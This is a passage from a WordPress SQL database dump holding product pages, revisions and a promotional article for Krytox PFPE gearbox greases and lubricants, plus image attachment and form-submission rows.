href="https://www.miller-stephenson.com/tech-support/">Technical Service</a> to determine if one of these grades is right for your application or if an additional grade is required.\r\n\r\nKrytox™ greases are made from clear, colorless fluorinated, synthetic oils that are non-reactive, non-flammable, safe in harsh environments, long lasting, and compatible with all seal materials. Krytox™ is a perfluoropolyether-based polymer composed of fluorine, oxygen, and carbon. No hydrogen is present in the molecule, resulting in exceptional stability and non-flammability.', 'Krytox GB A2', 'Krytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment.\r\n<br/><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'krytox-gb-a2', '', '', '2017-02-24 19:45:51', '2017-02-24 19:45:51', '', 0, 'https://www.miller-stephenson.com/product/krytox-gb-a2/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3723, 2, '2017-02-24 19:44:46', '2017-02-24 19:44:46', '', 'Krytox GB A2', '', 'inherit', 'closed', 'closed', '', 'shutterstock_359496941', '', '', '2017-02-24 19:45:07', '2017-02-24 19:45:07', '', 3722, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3724, 2, '2017-02-24 19:46:45', '2017-02-24 19:46:45', '<h3>Krytox GB C2 | Sootblower | Gearbox Grease | Premium Performance Gearbox Greases</h3>\r\nPerformance Lubricants has developed a series of greases specifically designed to lubricate and protect high temperature gearbox gears, bearings, and seals. Krytox™ fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments, even in applications with operating temperatures up to approximately 270 °C (518 °F). Use of Krytox™ gearbox grease will help eliminate bearing and gear failures resulting from lubricant oxidation, lead to longer seal life, and extend gearbox life. In many applications, Krytox GB C2 gearbox grease will last the life of the gearbox, greatly reducing\r\nor eliminating the need for maintenance and re-lubrication. When compared to oil-lubricated systems, use of Krytox™ grease can also significantly help reduce lubricant leakage related to seal failure.\r\n\r\nKrytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment. There are currently two grades of premium performance gearbox grease, Krytox™ GB M0 and GB H0, which are semi-fluid lubricants specifically designed for enclosed gearbox lubrication. As many gearbox designs utilize bearings that are not lubricated by the internal lubricant reservoir and require periodic re-lubrication (and this grease is often forced past the bearing seals into the reservoir), Krytox™ GB A2 and C2 have been added to the line to limit cross-contamination of the internal grease with a non-compatible bearing grease.\r\n\r\nPlease consult with Krytox™ <a href="https://www.miller-stephenson.com/tech-support/">Technical Service</a> to determine if one of these grades is right for your application or if an additional grade is required.\r\n\r\nKrytox™ greases are made from clear, colorless fluorinated, synthetic oils that are non-reactive, non-flammable, safe in harsh environments, long lasting, and compatible with all seal materials. Krytox™ is a perfluoropolyether-based polymer composed of fluorine, oxygen, and carbon. No hydrogen is present in the molecule, resulting in exceptional stability and non-flammability.', 'Krytox GB C2', 'Krytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment.\r\n\r\n\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'krytox-gb-c2', '', '', '2017-02-24 19:48:40', '2017-02-24 19:48:40', '', 0, 'https://www.miller-stephenson.com/product/krytox-gb-c2/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3725, 2, '2017-02-24 19:48:02', '2017-02-24 19:48:02', '', 'Krytox GB C2', '', 'inherit', 'closed', 'closed', '', 'shutterstock_447896557', '', '', '2017-02-24 19:48:20', '2017-02-24 19:48:20', '', 3724, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_447896557.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3726, 2, '2017-02-28 15:40:27', '2017-02-28 15:40:27', '<h3>When it Comes to Lubricants, the Lowest Price isn’t Always the Best Value</h3>\r\nMachine failures occur for a variety of reasons. Each one of these failures creates a ripple effect of costs and productivity loss. Some of these issues can be mitigated by choosing a high-performance lubricant – one that can withstand time and harsh environments. While high-performance lubricants are more expensive initially, the added expenditure is recovered through reduced breakdowns, downtime and maintenance costs, which results in long-term overall savings.\r\n<h4><strong>Find Compatibility and Productivity with High-Performing Krytox (PFPEs)</strong></h4>\r\n<img class="wp-image-3728 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Lubrication-Cost-Savings.jpg" alt="lubrication-cost-savings" width="215" height="255" />High-performance perfluoropolyether (PFPE) lubricants are inert, water and oil repellant, solvent resistant, nonflammable, non-toxic, and compatible with most common elastomers, plastics and metals. This unique chemistry enables them to outlast and outperform conventional hydrocarbon. Krytox lubricants perform under extreme temperatures, extreme pressure and exposure to harsh chemicals.\r\n\r\n<strong>Significantly Reduce Re-lubrication Intervals</strong>\r\n\r\nIt’s common practice to use hydrocarbon or silicone-based lubricants to re-lube components on a daily, weekly or monthly basis. With Krytox, that need is greatly reduced, freeing personnel for other tasks and minimizing downtime caused by the need to replace worn out components. Following are a few examples of Krytox driving performance, value and reducing downtime.\r\n<h4><strong>Krytox can Generate Savings</strong></h4>\r\nOne copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available. However, by switching to a PFPE lubricant, they lowered re-lubrication to a monthly interval and cut annual bearing failures by nearly 98% (reducing replacements from 186 bearings each year to four). By switching to Krytox, this manufacturer reduced maintenance costs, parts costs and production downtime. A cost analysis showed a total annual savings of $66,920.<img class="wp-image-3727 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Cost-Saving.jpg" alt="krytox-cost-saving" width="347" height="252" />\r\n<h4><strong>Krytox Can Extend Service Life</strong></h4>\r\nA U.S. textile manufacturer utilizes a hot flue drying oven as part of its process. In the drying oven, wet fabric passes along many bearing rolls inside a large metallic box, moving through nine heated zones with temperatures reaching 218 °C [425°F]. The company was replacing at least six bearings per month due to premature bearing failures. Frequent downtime was adversely affecting productivity. Worse, fabric quality was compromised. The manufacturer needed a lubricant that would retain its integrity at high temperatures in high humidity environments. After using a high-temperature Krytox grease, the manufacturer experienced a significant extension of bearing service life, minimizing costly downtime.\r\n<h4><strong>Krytox Can Limit Hazards</strong></h4>\r\nA polyethylene manufacturer was struggling with maintenance costs and frequent shutdowns of its high-capacity, sealed centrifuge because of hazardous material exposure. Specifically, a mineral oil lithium thickened grease, used in the centrifuge bearings, leaked and led to premature bearing failures. The leaking hazardous solvent created an additional exposure threat to workers. The new lubricant needed to be non-reactive and insoluble to hexane, provide enough adhesion to avoid leaks, and remain fluid enough to deliver the required lubrication. The manufacturer turned to Krytox. Since doing so, unplanned shutdowns and re-lubrication have both been reduced – with re-lubrication down to twice a year. These dramatic results decreased maintenance costs and increased worker safety.\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long term performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents. Additionally, Krytox™ lubricants are ISO 9001 and ISO 14001 certified, and several grades are NSF H-1.\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade. Resistant to chemical attack Krytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\n<span style="font-size: 75%;">The information set forth herein is furnished free of charge and based on technical data that Chemours believes to be reliable. Chemours makes no warranties, express or implied, and assumes no liability in connection with any use of this information. Nothing herein is to be taken as a license to operate under or a recommendation to infringe any patents or trademarks.</span>', 'How Krytox Drive Savings & Productivity', '', 'publish', 'closed', 'closed', '', 'krytox-drives-lubrication-savings', '', '', '2017-03-01 15:48:24', '2017-03-01 15:48:24', '', 0, 'https://www.miller-stephenson.com/?p=3726', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3727, 2, '2017-02-24 20:17:06', '2017-02-24 20:17:06', '', 'krytox-cost-saving', '', 'inherit', 'closed', 'closed', '', 'krytox-cost-saving', '', '', '2017-02-24 20:17:06', '2017-02-24 20:17:06', '', 3726, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Cost-Saving.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3728, 2, '2017-02-24 20:31:44', '2017-02-24 20:31:44', '', 'lubrication-cost-savings', '', 'inherit', 'closed', 'closed', '', 'lubrication-cost-savings', '', '', '2017-02-24 20:31:44', '2017-02-24 20:31:44', '', 3726, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/Lubrication-Cost-Savings.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3729, 2, '2017-02-24 20:40:32', '2017-02-24 20:40:32', '<h3>When it Comes to Lubricants, the Lowest Price isn’t Always the Best Value</h3>\r\nMachine failures occur for a variety of reasons. Each one of these failures creates a ripple effect of costs and productivity loss. Some of these issues can be mitigated by choosing a high-performance lubricant – one that can withstand time and harsh environments. While high-performance lubricants are more expensive initially, the added expenditure is recovered through reduced breakdowns, downtime and maintenance costs, which results in long-term overall savings.\r\n<h4><strong>Find Compatibility and Productivity with High-Performing Krytox (PFPEs)</strong></h4>\r\n<img class="wp-image-3728 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Lubrication-Cost-Savings.jpg" alt="lubrication-cost-savings" width="215" height="255" />High-performance perfluoropolyether (PFPE) lubricants are inert, water and oil repellant, solvent resistant, nonflammable, non-toxic, and compatible with most common elastomers, plastics and metals. This unique chemistry enables them to outlast and outperform conventional hydrocarbon. Krytox lubricants perform under extreme temperatures, extreme pressure and exposure to harsh chemicals.\r\n\r\n<strong>Significantly Reduce Re-lubrication Intervals</strong>\r\n\r\nIt’s common practice to use hydrocarbon or silicone-based lubricants to re-lube components on a daily, weekly or monthly basis. With Krytox, that need is greatly reduced, freeing personnel for other tasks and minimizing downtime caused by the need to replace worn out components. Following are a few examples of Krytox driving performance, value and reducing downtime:\r\n<h4><strong>Krytox can Generate Savings</strong></h4>\r\n<h4>One copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available.\r\nHowever, by switching to a PFPE lubricant, they lowered re-lubrication to a monthly interval and cut annual bearing failures by nearly 98% (reducing replacements from 186 bearings each year to four). By\r\nswitching to Krytox, this manufacturer reduced maintenance costs, parts costs and production downtime. A cost analysis showed a total annual savings of $66,920.<img class="wp-image-3727 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Cost-Saving.jpg" alt="krytox-cost-saving" width="347" height="252" /></h4>\r\n<h4><strong>Krytox Can Extend Service Life</strong></h4>\r\n<h4>A U.S. textile manufacturer utilizes a hot flue drying oven as part of its process. In the drying oven, wet fabric passes along many bearing rolls inside a large metallic box, moving through nine heated zones with temperatures reaching 218 °C [425°F]. The company was replacing at least six bearings per month due to premature bearing failures. Frequent downtime was adversely affecting productivity. Worse, fabric quality was compromised. The manufacturer needed a lubricant that would retain its integrity at high temperatures in high humidity environments. After using a high-temperature Krytox grease, the manufacturer experienced a significant extension of bearing service life, minimizing costly downtime.</h4>\r\n<h4><strong>Krytox Can Limit Hazards</strong></h4>\r\n<h4>A polyethylene manufacturer was struggling with maintenance costs and frequent shutdowns of its high-capacity, sealed centrifuge because of hazardous material exposure. Specifically, a mineral oil lithium thickened grease, used in the centrifuge bearings, leaked and led to premature bearing failures. The leaking hazardous solvent created an additional exposure threat to workers. The new lubricant needed to be non-reactive and insoluble to hexane, provide enough adhesion to avoid leaks, and remain fluid enough to deliver the required lubrication. The manufacturer turned to Krytox. Since doing so, unplanned shutdowns and re-lubrication have both been reduced – with re-lubrication down to twice a year. These dramatic results decreased maintenance costs and increased worker safety.</h4>\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer longterm performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents. Additionally, Krytox™ lubricants are ISO 9001 and ISO 14001 certified, and several grades are NSF H-1.\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade. Resistant to chemical attack Krytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.', 'How Krytox Drive Savings & Productivity', '', 'inherit', 'closed', 'closed', '', '3726-revision-v1', '', '', '2017-02-24 20:40:32', '2017-02-24 20:40:32', '', 3726, 'https://www.miller-stephenson.com/3726-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3730, 0, '2017-02-27 11:21:52', '2017-02-27 11:21:52', '', '', '', 'publish', 'closed', 'closed', '', '3730', '', '', '2017-02-27 11:21:52', '2017-02-27 11:21:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/3730/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3731, 0, '2017-02-27 18:04:16', '2017-02-27 18:04:16', '', '', '', 'publish', 'closed', 'closed', '', '3731', '', '', '2017-02-27 18:04:16', '2017-02-27 18:04:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3731/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3732, 0, '2017-02-27 18:40:51', '2017-02-27 18:40:51', '', '', '', 'publish', 'closed', 'closed', '', '3732', '', '', '2017-02-27 18:40:51', '2017-02-27 18:40:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/3732/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3733, 0, '2017-02-27 20:20:26', '2017-02-27 20:20:26', '', '', '', 'publish', 'closed', 'closed', '', '3733', '', '', '2017-02-27 20:20:26', '2017-02-27 20:20:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/3733/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3734, 0, '2017-02-27 20:35:06', '2017-02-27 20:35:06', '', '', '', 'publish', 'closed', 'closed', '', '3734', '', '', '2017-02-27 20:35:07', '2017-02-27 20:35:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3734/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3735, 0, '2017-02-27 21:58:34', '2017-02-27 21:58:34', '', '', '', 'publish', 'closed', 'closed', '', '3735', '', '', '2017-02-27 21:58:34', '2017-02-27 21:58:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3735/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3736, 0, '2017-02-28 00:03:57', '2017-02-28 00:03:57', '', '', '', 'publish', 'closed', 'closed', '', '3736', '', '', '2017-02-28 00:03:57', '2017-02-28 00:03:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/3736/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3737, 0, '2017-02-28 00:35:30', '2017-02-28 00:35:30', '', '', '', 'publish', 'closed', 'closed', '', '3737', '', '', '2017-02-28 00:35:31', '2017-02-28 00:35:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3737/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3738, 0, '2017-02-28 06:20:09', '2017-02-28 06:20:09', '', '', '', 'publish', 'closed', 'closed', '', '3738', '', '', '2017-02-28 06:20:09', '2017-02-28 06:20:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/3738/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3739, 0, '2017-02-28 14:30:51', '2017-02-28 14:30:51', '', '', '', 'publish', 'closed', 'closed', '', '3739', '', '', '2017-02-28 14:30:51', '2017-02-28 14:30:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/3739/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3740, 0, '2017-02-28 15:36:47', '2017-02-28 15:36:47', '', '', '', 'publish', 'closed', 'closed', '', '3740', '', '', '2017-02-28 15:36:47', '2017-02-28 15:36:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3740/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3741, 2, '2017-02-28 15:39:02', '2017-02-28 15:39:02', '', 'Krytox Lubricant Savings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_268397873', '', '', '2017-02-28 15:39:18', '2017-02-28 15:39:18', '', 3726, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_268397873.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3742, 2, '2017-02-28 15:40:27', '2017-02-28 15:40:27', '<h3>When it Comes to Lubricants, the Lowest Price isn’t Always the Best Value</h3>\r\nMachine failures occur for a variety of reasons. Each one of these failures creates a ripple effect of costs and productivity loss. Some of these issues can be mitigated by choosing a high-performance lubricant – one that can withstand time and harsh environments. While high-performance lubricants are more expensive initially, the added expenditure is recovered through reduced breakdowns, downtime and maintenance costs, which results in long-term overall savings.\r\n<h4><strong>Find Compatibility and Productivity with High-Performing Krytox (PFPEs)</strong></h4>\r\n<img class="wp-image-3728 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Lubrication-Cost-Savings.jpg" alt="lubrication-cost-savings" width="215" height="255" />High-performance perfluoropolyether (PFPE) lubricants are inert, water and oil repellant, solvent resistant, nonflammable, non-toxic, and compatible with most common elastomers, plastics and metals. This unique chemistry enables them to outlast and outperform conventional hydrocarbon. Krytox lubricants perform under extreme temperatures, extreme pressure and exposure to harsh chemicals.\r\n\r\n<strong>Significantly Reduce Re-lubrication Intervals</strong>\r\n\r\nIt’s common practice to use hydrocarbon or silicone-based lubricants to re-lube components on a daily, weekly or monthly basis. With Krytox, that need is greatly reduced, freeing personnel for other tasks and minimizing downtime caused by the need to replace worn out components. Following are a few examples of Krytox driving performance, value and reducing downtime:\r\n<h4><strong>Krytox can Generate Savings</strong></h4>\r\n<h4>One copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available.\r\nHowever, by switching to a PFPE lubricant, they lowered re-lubrication to a monthly interval and cut annual bearing failures by nearly 98% (reducing replacements from 186 bearings each year to four). By\r\nswitching to Krytox, this manufacturer reduced maintenance costs, parts costs and production downtime. A cost analysis showed a total annual savings of $66,920.<img class="wp-image-3727 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Cost-Saving.jpg" alt="krytox-cost-saving" width="347" height="252" /></h4>\r\n<h4><strong>Krytox Can Extend Service Life</strong></h4>\r\n<h4>A U.S. textile manufacturer utilizes a hot flue drying oven as part of its process. In the drying oven, wet fabric passes along many bearing rolls inside a large metallic box, moving through nine heated zones with temperatures reaching 218 °C [425°F]. The company was replacing at least six bearings per month due to premature bearing failures. Frequent downtime was adversely affecting productivity. Worse, fabric quality was compromised. The manufacturer needed a lubricant that would retain its integrity at high temperatures in high humidity environments. After using a high-temperature Krytox grease, the manufacturer experienced a significant extension of bearing service life, minimizing costly downtime.</h4>\r\n<h4><strong>Krytox Can Limit Hazards</strong></h4>\r\n<h4>A polyethylene manufacturer was struggling with maintenance costs and frequent shutdowns of its high-capacity, sealed centrifuge because of hazardous material exposure. Specifically, a mineral oil lithium thickened grease, used in the centrifuge bearings, leaked and led to premature bearing failures. The leaking hazardous solvent created an additional exposure threat to workers. The new lubricant needed to be non-reactive and insoluble to hexane, provide enough adhesion to avoid leaks, and remain fluid enough to deliver the required lubrication. The manufacturer turned to Krytox. Since doing so, unplanned shutdowns and re-lubrication have both been reduced – with re-lubrication down to twice a year. These dramatic results decreased maintenance costs and increased worker safety.</h4>\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long term performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents. Additionally, Krytox™ lubricants are ISO 9001 and ISO 14001 certified, and several grades are NSF H-1.\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade. Resistant to chemical attack Krytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\n<span style="font-size: 75%;">The information set forth herein is furnished free of charge and based on technical data that Chemours believes to be reliable. Chemours makes no warranties, express or implied, and assumes no liability in connection with any use of this information. Nothing herein is to be taken as a license to operate under or a recommendation to infringe any patents or trademarks.</span>', 'How Krytox Drive Savings & Productivity', '', 'inherit', 'closed', 'closed', '', '3726-revision-v1', '', '', '2017-02-28 15:40:27', '2017-02-28 15:40:27', '', 3726, 'https://www.miller-stephenson.com/3726-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3743, 2, '2017-02-28 15:41:53', '2017-02-28 15:41:53', '<h3>When it Comes to Lubricants, the Lowest Price isn’t Always the Best Value</h3>\r\nMachine failures occur for a variety of reasons. Each one of these failures creates a ripple effect of costs and productivity loss. Some of these issues can be mitigated by choosing a high-performance lubricant – one that can withstand time and harsh environments. While high-performance lubricants are more expensive initially, the added expenditure is recovered through reduced breakdowns, downtime and maintenance costs, which results in long-term overall savings.\r\n<h4><strong>Find Compatibility and Productivity with High-Performing Krytox (PFPEs)</strong></h4>\r\n<img class="wp-image-3728 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Lubrication-Cost-Savings.jpg" alt="lubrication-cost-savings" width="215" height="255" />High-performance perfluoropolyether (PFPE) lubricants are inert, water and oil repellant, solvent resistant, nonflammable, non-toxic, and compatible with most common elastomers, plastics and metals. This unique chemistry enables them to outlast and outperform conventional hydrocarbon. Krytox lubricants perform under extreme temperatures, extreme pressure and exposure to harsh chemicals.\r\n\r\n<strong>Significantly Reduce Re-lubrication Intervals</strong>\r\n\r\nIt’s common practice to use hydrocarbon or silicone-based lubricants to re-lube components on a daily, weekly or monthly basis. With Krytox, that need is greatly reduced, freeing personnel for other tasks and minimizing downtime caused by the need to replace worn out components. Following are a few examples of Krytox driving performance, value and reducing downtime.\r\n<h4><strong>Krytox can Generate Savings</strong></h4>\r\nOne copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available.\r\nHowever, by switching to a PFPE lubricant, they lowered re-lubrication to a monthly interval and cut annual bearing failures by nearly 98% (reducing replacements from 186 bearings each year to four). By\r\nswitching to Krytox, this manufacturer reduced maintenance costs, parts costs and production downtime. A cost analysis showed a total annual savings of $66,920.<img class="wp-image-3727 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Cost-Saving.jpg" alt="krytox-cost-saving" width="347" height="252" />\r\n<h4><strong>Krytox Can Extend Service Life</strong></h4>\r\nA U.S. textile manufacturer utilizes a hot flue drying oven as part of its process. In the drying oven, wet fabric passes along many bearing rolls inside a large metallic box, moving through nine heated zones with temperatures reaching 218 °C [425°F]. The company was replacing at least six bearings per month due to premature bearing failures. Frequent downtime was adversely affecting productivity. Worse, fabric quality was compromised. The manufacturer needed a lubricant that would retain its integrity at high temperatures in high humidity environments. After using a high-temperature Krytox grease, the manufacturer experienced a significant extension of bearing service life, minimizing costly downtime.\r\n<h4><strong>Krytox Can Limit Hazards</strong></h4>\r\nA polyethylene manufacturer was struggling with maintenance costs and frequent shutdowns of its high-capacity, sealed centrifuge because of hazardous material exposure. Specifically, a mineral oil lithium thickened grease, used in the centrifuge bearings, leaked and led to premature bearing failures. The leaking hazardous solvent created an additional exposure threat to workers. The new lubricant needed to be non-reactive and insoluble to hexane, provide enough adhesion to avoid leaks, and remain fluid enough to deliver the required lubrication. The manufacturer turned to Krytox. Since doing so, unplanned shutdowns and re-lubrication have both been reduced – with re-lubrication down to twice a year. These dramatic results decreased maintenance costs and increased worker safety.\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long term performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents. Additionally, Krytox™ lubricants are ISO 9001 and ISO 14001 certified, and several grades are NSF H-1.\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade. Resistant to chemical attack Krytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\n<span style="font-size: 75%;">The information set forth herein is furnished free of charge and based on technical data that Chemours believes to be reliable. Chemours makes no warranties, express or implied, and assumes no liability in connection with any use of this information. Nothing herein is to be taken as a license to operate under or a recommendation to infringe any patents or trademarks.</span>', 'How Krytox Drive Savings & Productivity', '', 'inherit', 'closed', 'closed', '', '3726-revision-v1', '', '', '2017-02-28 15:41:53', '2017-02-28 15:41:53', '', 3726, 'https://www.miller-stephenson.com/3726-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3744, 2, '2017-02-28 16:14:48', '2017-02-28 16:14:48', '<h2>Comparing Industrial Lubricants - Downsides of Hydrocarbons</h2>\r\n<h3>Petroleum-Based and Synthetic Hydrocarbon Lubricants vs. Krytox (PFPEs)</h3>\r\nWhile industrial lubricants only make up 1% of plant operational costs, the lack of proper lubrication or application can have an adverse impact on total maintenance costs and downtime. More than half of the total maintenance costs, as well as a cause of downtime, is directly related to one of the smallest budgeted items.\r\n\r\nThe ultimate industrial lubricant is one that lasts a long time and “just works.” That means it works just as well under normal temperature conditions, as well as in an extremely hot environment; or when faced with harsh chemicals, like boiling sulfuric acid.\r\n\r\nOne class of non-traditional synthetic industrial lubricants – perfluoropolyether (PFPE) lubricants – provides longerlasting performance, which results in reduced wear and tear for machine parts, lower maintenance costs and fewer production delays, even in the harshest environments.\r\n\r\nParts and equipment generally require more maintenance and capital reinvestment in environments where extreme temperatures and pressures are combined with harsh chemicals and conditions. Traditionally used petroleumbased hydrocarbon lubricants break down and fail at extreme temperatures with pressure and chemical exposures, requiring more frequent machine maintenance and causing shorter parts lifespans. Traditional synthetic industrial lubricants may provide only marginally better results.\r\n\r\nPFPE lubricants are proven to provide the broadest benefits, even in the most extreme conditions without breaking down. Using PFPE reduces equipment failure, maintenance cost, parts replacement and labor costs. More importantly, it reduces production downtime.\r\n\r\nThough more expensive than petroleum-based and other traditional synthetic industrial lubricants, PFPEs provide a short payback period and long-term benefits.\r\n<h4><strong>Stable Performance in Harsh Environments</strong></h4>\r\nOne of the greatest advantages of using PFPE lubricants is stability across a wide variety of operating conditions and environments. This inert nature is what allows PFPE greases and oils to outlast and outperform competing traditional synthetic and hydrocarbon products.\r\n\r\nIn addition to PFPE lubricants being chemically inert compared to virtually all chemicals commonly used in most industries, they are also water and oil repellent, solvent resistant, nonflammable, compatible with oxygen and reactive gases and non-toxic. And, they are compatible with most common elastomers, plastics and metals.\r\n\r\nEven with PFPEs having such extreme capabilities, they are completely safe to handle. When comparing the MSDS of Krytox™ lubricant, a type of PFPE lubricant, to the MSDS of sugar, sugar is more dangerous to handle.\r\n\r\nUsing PFPE lubricants can contribute significantly to lowering the cost of doing business – industries, such as aerospace, automotive and chemical, have used PFPEs with exceptional performance and reliability in the toughest conditions, where productivity matters and downtime is costly.\r\n<h4><strong>Extreme Compatibility</strong></h4>\r\nPFPE lubricants are stable and effective among other lubricants as well as steam, moisture and harsh chemicals. Because of their chemically inert properties, PFPE lubricants are safe to use with more than 100 different chemicals without degradation, including boiling sulfuric acid.\r\n\r\n<strong>Can Your 